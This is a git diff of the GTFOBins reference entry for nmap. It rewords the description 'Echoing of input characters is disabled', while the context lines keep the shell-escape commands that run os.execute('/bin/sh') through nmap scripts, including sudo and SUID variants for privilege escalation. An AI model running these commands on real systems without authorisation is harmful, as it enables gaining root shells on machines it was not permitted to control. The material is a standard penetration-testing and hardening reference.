diff --git a/_gtfobins/nmap.md b/_gtfobins/nmap.md index 1679503..12b3a17 100644 --- a/_gtfobins/nmap.md +++ b/_gtfobins/nmap.md @@ -1,19 +1,19 @@ --- functions: execute-interactive: - - description: Echoing of input characters is disabled. + - description: Input echo is disabled. code: | TF=$(mktemp) echo 'os.execute("/bin/sh")' > $TF nmap --script=$TF sudo-enabled: - - description: Echoing of input characters is disabled. + - description: Input echo is disabled. code: | TF=$(mktemp) echo 'os.execute("/bin/sh")' > $TF sudo nmap --script=$TF suid-enabled: - - description: Echoing of input characters is disabled. + - description: Input echo is disabled. code: | TF=$(mktemp) echo 'os.execute("/bin/sh -p")' > $TF